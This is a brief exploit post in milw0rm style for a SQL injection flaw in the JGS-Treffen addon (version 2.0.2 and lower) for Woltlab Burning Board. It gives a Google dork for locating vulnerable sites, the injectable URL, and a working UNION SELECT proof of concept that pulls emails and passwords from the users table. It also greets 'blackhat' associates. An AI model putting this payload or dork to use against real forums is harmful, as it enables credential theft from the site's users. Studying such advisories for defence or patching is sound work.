31 lines
No EOL
687 B
Text
31 lines
No EOL
687 B
Text
######################
|
|
#
|
|
#Woltlab Burning Board Addon JGS-Treffen SQL Injection
|
|
#
|
|
######################
|
|
#
|
|
#Bug by: h0yt3r
|
|
#
|
|
#Dork: inurl:jgs_treffen.php
|
|
#
|
|
##
|
|
###
|
|
##
|
|
#
|
|
#There is a bug in jgs_treffen.php 2.0.2 and lower.
|
|
#It's already fixed in newer Versions...
|
|
#
|
|
#SQL Injection:
|
|
#http://[target]/[path]/jgs_treffen.php?action=ansicht&view_id=[SQL]
|
|
#
|
|
#PoC:
|
|
#jgs_treffen.php?action=ansicht&view_id='-1/**/UnIoN/**/All/**/SeLeCt/**/1,2,CoNcAt(email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/bb1_users/*
|
|
#
|
|
#######################
|
|
#
|
|
#Greetz to ramon, thund3r and all the other dirty blackhat rest xD!
|
|
#
|
|
#######################
|
|
#######################
|
|
|
|
# milw0rm.com [2008-03-31] |